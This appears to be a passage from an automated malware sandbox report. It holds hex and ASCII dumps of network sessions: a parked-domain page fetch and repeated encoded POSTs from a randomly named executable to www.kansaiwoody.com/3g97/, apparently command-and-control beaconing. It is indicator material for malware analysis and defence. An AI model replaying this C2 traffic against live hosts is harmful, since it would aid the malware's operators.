                                                                                              Data Raw: 32 43 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 46 59 76 65 62 53 38 32 31 42 37 69 4d 68 66 4e 5a 2f 77 31 67 6d 4b 4e 4f 52 79 77 4d 31 78 48 4d 77 49 46 67 4a 72 6f 38 67 6a 55 78 75 79 5a 44 44 42 30 67 54 48 79 4e 46 78 59 30 36 6d 46 6d 33 68 52 37 6b 6f 4c 31 7a 36 2b 49 69 36 31 41 72 64 4e 6e 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 70 61 79 64 61 79 6c 6f 61 6e 73 33 2e 73 68 6f 70 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 70 61 79 64 61 79 6c 6f 61 6e 73 33 20 52 65 73 6f 75 72 63 65 73 20 61 6e 64 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 70 61 79 64 61 79 6c 6f 61 6e 73 33 2e 73 68 6f 70 20 69 73 20 79 6f 75 72 20 66 69 72 73 74 20 61 6e 64 20 62 65 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f
                                                                                              Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_FYvebS821B7iMhfNZ/w1gmKNORywM1xHMwIFgJro8gjUxuyZDDB0gTHyNFxY06mFm3hR7koL1z6+Ii61ArdNnA==><head><meta charset="utf-8"><title>paydayloans3.shop&nbsp;-&nbsp;paydayloans3 Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="paydayloans3.shop is your first and best source for all of the information youre looking for. Fro
                                                                                              Apr 24, 2024 07:27:57.134382963 CEST1289INData Raw: 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 70 61 79 64 61 79 6c 6f 61 6e 73 33 2e 73 68 6f 70 20
                                                                                              Data Ascii: m general topics to more of what you would expect to find here, paydayloans3.shop has it all. We hope yAECou find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/
                                                                                              Apr 24, 2024 07:27:57.134408951 CEST1289INData Raw: 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b
                                                                                              Data Ascii: idden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-appearance
                                                                                              Apr 24, 2024 07:27:57.134422064 CEST1289INData Raw: 67 72 6f 75 6e 64 3a 23 32 37 33 39 34 38 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 61 6e 6e 6f
                                                                                              Data Ascii: ground:#273948;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center}.c
                                                                                              Apr 24, 2024 07:27:57.134497881 CEST1289INData Raw: 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e
                                                                                              Data Ascii: ontent-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-link{font-
                                                                                              Apr 24, 2024 07:27:57.134512901 CEST1289INData Raw: 6e 3a 61 6c 6c 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 68 65 61 64 65
                                                                                              Data Ascii: n:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline-block;max-width:550
                                                                                              Apr 24, 2024 07:27:57.134588003 CEST1289INData Raw: 38 33 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 62 6f 72 64 65 72 2d
                                                                                              Data Ascii: 83;color:#fff;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:initial}.switch input{opac
                                                                                              Apr 24, 2024 07:27:57.134602070 CEST1289INData Raw: 6d 70 6f 72 74 61 6e 74 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65 72 2d 72 65 6c 61 74 65 64 6c 69 6e 6b 73 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e
                                                                                              Data Ascii: mportant;overflow:hidden}.container-content__container-relatedlinks,.container-content__container-ads,.container-content__webarchive{width:30%;display:inline-block}.container-content__container-relatedlinks{margin-top:7%;flex-grow:1;width:300p
                                                                                              Apr 24, 2024 07:27:57.134722948 CEST1289INData Raw: 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 2d 79 3a 74 6f 70 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 2d 2d 74 77 6f 74 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 72 69 67 68 74 7b 62 61 63 6b 67 72 6f 75
                                                                                              Data Ascii: kground-position-y:top}.container-content--twot .container-content__right{background-position-y:top}.container-content--wa .container-content__left{background-position-y:top}.container-content--wa .container-content__right{background-position-
                                                                                              Apr 24, 2024 07:27:57.134736061 CEST1289INData Raw: 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 7b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d
                                                                                              Data Ascii: }.webarchive-block__list-element{word-wrap:break-word;list-style:none}.webarchive-block__list-element-link{line-height:30px;font-size:20px;color:#9fd801}.webarchive-block__list-element-link:link,.webarchive-block__list-element-link:visited{tex
                                                                                              Apr 24, 2024 07:27:57.441720963 CEST1289INData Raw: 59 30 4e 7a 59 6d 64 47 4e 70 5a 44 31 33 64 33 63 75 63 47 46 35 5a 47 46 35 62 47 39 68 62 6e 4d 7a 4c 6e 4e 6f 62 33 41 32 4e 6a 49 34 4f 54 67 31 59 32 56 6b 4d 6a 6b 33 4f 53 34 33 4e 6a 55 35 4e 54 4d 7a 4d 69 5a 30 59 58 4e 72 50 58 4e 6c
                                                                                              Data Ascii: Y0NzYmdGNpZD13d3cucGF5ZGF5bG9hbnMzLnNob3A2NjI4OTg1Y2VkMjk3OS43NjU5NTMzMiZ0YXNrPXNlYXJjaCZkb21haW49cGF5ZGF5bG9hbnMzLnNob3AmYV9pZD0xJnNlc3Npb249RF9ocmM5WnZiLXhOS1E1Q3cyeHImdHJhY2txdWVyeT0x"},"imprintUrl":false,"contactUsUrl":false,"contentType":


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              25192.168.2.449766118.27.122.214801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:28:03.112780094 CEST734OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.kansaiwoody.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 202
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.kansaiwoody.com
                                                                                              Referer: http://www.kansaiwoody.com/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 41 42 68 32 62 74 53 6d 73 72 78 7a 51 42 62 75 63 41 6d 4f 77 4e 59 5a 38 30 50 66 4f 45 49 31 61 46 34 45 71 34 34 68 61 52 2f 34 6f 62 58 52 56 74 4f 67 56 33 4d 36 6c 45 6c 55 44 62 74 77 41 48 38 37 43 78 2b 34 77 74 55 37 77 50 57 72 67 2b 6c 6f 51 49 44 45 36 70 30 70 32 4f 65 56 37 37 46 35 5a 44 71 34 57 59 48 33 6f 61 66 6a 34 56 58 41 55 6a 6e 65 47 4d 78 52 66 77 78 33 56 47 5a 6f 38 59 59 45 49 49 79 35 77 4b 7a 34 6b 77 66 56 2f 51 41 78 57 52 50 4a 4e 32 71 56 76 65 6d 4b 66 53 4c 38 67 30 6d 33 38 67 6b 7a 75 50 35 59 55 61 32 4a 31 37 6b 37 33 4b 73 4a 77 77 3d 3d
                                                                                              Data Ascii: 12l42=ABh2btSmsrxzQBbucAmOwNYZ80PfOEI1aF4Eq44haR/4obXRVtOgV3M6lElUDbtwAH87Cx+4wtU7wPWrg+loQIDE6p0p2OeV77F5ZDq4WYH3oafj4VXAUjneGMxRfwx3VGZo8YYEIIy5wKz4kwfV/QAxWRPJN2qVvemKfSL8g0m38gkzuP5YUa2J17k73KsJww==
                                                                                              Apr 24, 2024 07:28:03.388254881 CEST377INHTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Wed, 24 Apr 2024 05:28:03 GMT
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Content-Encoding: gzip
                                                                                              Data Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              26192.168.2.449767118.27.122.214801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:28:05.904124022 CEST754OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.kansaiwoody.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 222
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.kansaiwoody.com
                                                                                              Referer: http://www.kansaiwoody.com/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 41 42 68 32 62 74 53 6d 73 72 78 7a 4b 69 7a 75 62 68 6d 4f 32 74 59 57 35 30 50 66 45 6b 4a 38 61 46 30 45 71 38 67 78 61 6b 50 34 6f 2b 7a 52 62 4d 4f 67 5a 58 4d 36 78 55 6c 72 4f 37 74 2f 41 48 77 4a 43 7a 71 34 77 75 6f 37 77 4b 71 72 31 64 4e 70 54 34 44 47 6a 35 30 72 37 75 65 56 37 37 46 35 5a 48 4c 74 57 59 50 33 6f 4a 58 6a 71 68 44 66 4b 7a 6e 66 46 4d 78 52 4f 41 78 7a 56 47 5a 57 38 59 70 4d 49 4c 61 35 77 49 62 34 71 43 33 61 77 51 41 33 59 78 50 58 41 57 4c 4c 6a 2b 6a 37 51 79 6d 64 76 55 69 78 35 6d 31 70 2f 2b 59 50 47 61 53 36 6f 38 74 50 36 4a 52 41 72 2f 38 4b 43 50 68 61 52 49 6a 68 58 4d 68 75 64 41 63 7a 73 49 30 3d
                                                                                              Data Ascii: 12l42=ABh2btSmsrxzKizubhmO2tYW50PfEkJ8aF0Eq8gxakP4o+zRbMOgZXM6xUlrO7t/AHwJCzq4wuo7wKqr1dNpT4DGj50r7ueV77F5ZHLtWYP3oJXjqhDfKznfFMxROAxzVGZW8YpMILa5wIb4qC3awQA3YxPXAWLLj+j7QymdvUix5m1p/+YPGaS6o8tP6JRAr/8KCPhaRIjhXMhudAczsI0=
                                                                                              Apr 24, 2024 07:28:06.164176941 CEST377INHTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Wed, 24 Apr 2024 05:28:06 GMT
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Content-Encoding: gzip
                                                                                              Data Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              27192.168.2.449768118.27.122.214801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:28:08.740825891 CEST10836OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.kansaiwoody.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 10302
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.kansaiwoody.com
                                                                                              Referer: http://www.kansaiwoody.com/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 41 42 68 32 62 74 53 6d 73 72 78 7a 4b 69 7a 75 62 68 6d 4f 32 74 59 57 35 30 50 66 45 6b 4a 38 61 46 30 45 71 38 67 78 61 6c 62 34 6f 4d 37 52 62 76 32 67 59 58 4d 36 74 6b 6c 51 4f 37 74 59 41 47 5a 43 43 7a 6d 4f 77 6f 6b 37 68 59 79 72 78 63 4e 70 45 6f 44 47 73 5a 30 71 32 4f 65 41 37 37 56 31 5a 44 76 74 57 59 50 33 6f 49 6e 6a 39 6c 58 66 49 7a 6e 65 47 4d 78 4e 66 77 77 6b 56 46 70 67 38 5a 64 63 49 36 36 35 78 6f 4c 34 6d 52 66 61 35 51 41 31 56 52 4f 45 41 57 48 71 6a 2b 2b 45 51 79 6a 49 76 57 2b 78 34 48 77 56 6d 75 51 73 62 6f 65 69 32 2f 52 4b 38 34 46 75 6b 76 51 69 4a 72 46 77 4d 73 76 49 61 50 55 62 45 44 41 5a 32 75 55 71 33 4d 4c 44 53 6c 55 57 62 37 30 35 66 58 47 42 32 4e 48 56 6c 65 4d 59 33 56 71 4a 47 46 4e 44 31 39 77 79 75 48 65 44 37 61 62 76 55 50 4c 6d 4c 34 6b 6c 5a 39 6f 70 51 69 74 35 6a 33 71 74 2f 4d 48 34 37 70 55 57 48 5a 50 72 55 68 6e 4f 32 76 65 66 72 79 39 32 67 55 4c 78 31 74 2f 68 72 59 79 71 4c 57 6b 6b 38 6a 42 68 6c 49 49 67 50 2f 4f 2b 55 49 43 32 6f 41 33 5a 47 55 64 4e 34 77 52 47 35 30 57 4b 46 44 55 6f 7a 61 79 36 4f 32 4e 42 53 78 41 43 49 69 33 57 31 72 4a 2b 37 65 68 2b 45 79 7a 51 4c 56 5a 46 4b 36 63 46 7a 66 50 55 6c 6e 32 67 70 54 6c 57 55 70 59 64 36 78 51 5a 62 64 33 68 50 6b 4c 65 64 4f 41 6c 55 67 64 32 37 70 4c 35 6c 49 73 44 57 51 59 48 52 33 37 59 7a 62 6c 36 32 4a 33 57 6d 33 41 41 66 59 55 59 46 41 70 41 65 49 49 4c 47 58 2b 30 32 39 6c 59 38 75 6c 68 46 6d 73 6b 47 71 79 6d 6d 6e 46 68 73 47 52 32 6a 76 61 79 76 4b 4d 4f 52 46 69 63 52 36 36 67 64 41 71 36 6d 35 2f 43 63 39 6a 58 4b 5a 6a 35 57 32 41 6e 4f 5a 74 68 6b 77 53 47 63 6f 4f 2f 45 71 4c 74 5a 46 4c 77 76 57 4a 48 68 32 75 48 2b 51 33 77 33 34 44 75 66 79 61 39 35 65 64 68 2b 33 66 73 48 6a 36 74 62 51 53 46 6f 2f 58 48 56 54 59 55 4d 54 2f 6a 74 47 58 34 4b 35 2f 43 67 77 59 68 73 79 2b 49 51 77 50 2f 69 4c 79 78 6f 34 4e 2b 63 70 30 6e 35 42 73 77 4b 37 35 73 6c 67 56 58 43 71 61 35 6b 31 6e 72 2f 39 6d 37 37 31 6f 48 59 6e 4c 58 41 72 33 74 56 69 75 76 72 32 6b 30 67 78 66 73 38 41 61 4a 62 67 6f 61 35 54 34 33 49 55 73 4b 59 57 61 52 45 30 61 69 4d 44 78 2f 59 4d 56 66 6b 4c 33 43 49 4d 49 4f 44 72 51 41 72 36 71 61 70 35 4d 46 76 6e 2f 74 73 53 33 7a 71 6d 67 43 46 38 69 6d 51 70 59 36 35 71 30 62 67 48 70 78 4c 42 78 42 32 38 46 73 52 4c 6e 71 68 73 62 79 5a 76 4c 76 42 35 71 45 31 6b 6c 76 43 36 58 6f 50 75 77 38 47 46 78 31 34 6c 63 67 63 51 4e 56 75 51 4e 42 4a 2f 67 39 67 2b 50 63 6b 77 62 6b 77 66 46 6c 32 48 67 62 48 50 65 58 74 66 53 45 57 46 6e 35 46 70 69 67 6b 46 63 47 67 63 47 76 6e 35 70 4d 73 54 76 43 64 74 76 4e 56 65 43 4a 45 41 38 74 56 71 2f 73 63 56 34 55 30 70 61 67 66 5a 74 68 52 7a 65 4b 39 4e 6b 2f 77 67 6c 65 70 4b 56 38 4c 37 2f 2b 71 43 6f 64 53 6d 43 65 77 54 65 4e 4f 2b 7a 7a 6f 2b 6b 66 74 31 2b 66 5a 42 53 4f 62 47 58 6f 54 4a 77 34 52 31 4d 6e 7a 34 6c 39 4b 50 71 34 43 51 68 6d 72 48 66 55 43 34 70 42 4d 6a 6e 78 79 4a 4d 42 49 56 41 39 44 46 41 65 7a 6d 52 55 42 7a 53 6c 37 69 4f 62 56 4d 64 33 51 36 38 59 32 4d 34 79 49 42 65 64 5a 4e 72 36 5a 6d 65 73 67 63 79 69 61 77 31 4a 6e 46 33 77 30 72 5a 30 75 47 71 76 35 31 45 64 57 7a 58 6a 63 2b 4a 5a 78 73 4a 54 4e 38 66 36 2f 49 4d 34 42 4d 62 59 33 2b 51 49 4f 72 73 64 58 75 38 52 61 53 5a 55 34 52 4c 70 75 4a 6e 48 73 2b 72 75 6b 67 43 33 6e 7a 57 55 58 34 77 62 49 55 43 50 41 45 38 64 33 4e 74 35 4a 44 4b 56 72 7a 51 62 50 58 33 57 46 65 2b 36 53 46 4a 4c 79 62 71 6b 69 42 30 6b 45 58 44 72 4c 38 4b 4b 67 35 6e 53 42 44 76 33 55 5a 59 6a 32 67 4d 7a 32 62 2b 52 63 71 55 66 70 30 55 33 57 50 64 43 6f 42 55 63 4e 45 4d 34 49 68 6c 2b 33 7a 70 69 54 52 30 74 45 31 47 65 6a 6d 68 37 54 5a 6f 78 6b 75 74 77 2b 49 4c 6f 42 42 69 59 6a 7a 41 57 50 6a 76 48 4d 37 57 50 35 36 44 46 4f 5a 77 51 36 56 65 36 6f 74 47 4d 73 51 68 72 32 35 64 58 30 39 6b 62 39 45 4a 6c 37 57 42 72 7a 72 50 6e 50 6f 71 62 5a 59 51 71 78 55 4d 56 55 6b 52 6a 66 50 71 45 50 49 2b 59 4b 74 53 4d 33 6e 55 2f 37 52 62 6e 7a 58 38 6a 31 69 53 67 59 49 39 49 56 67 31 77 69 2b 6e 78 61 6c 71 51 50 37 51 67 6f 46 71 50 51
                                                                                              Data Ascii: 12l42=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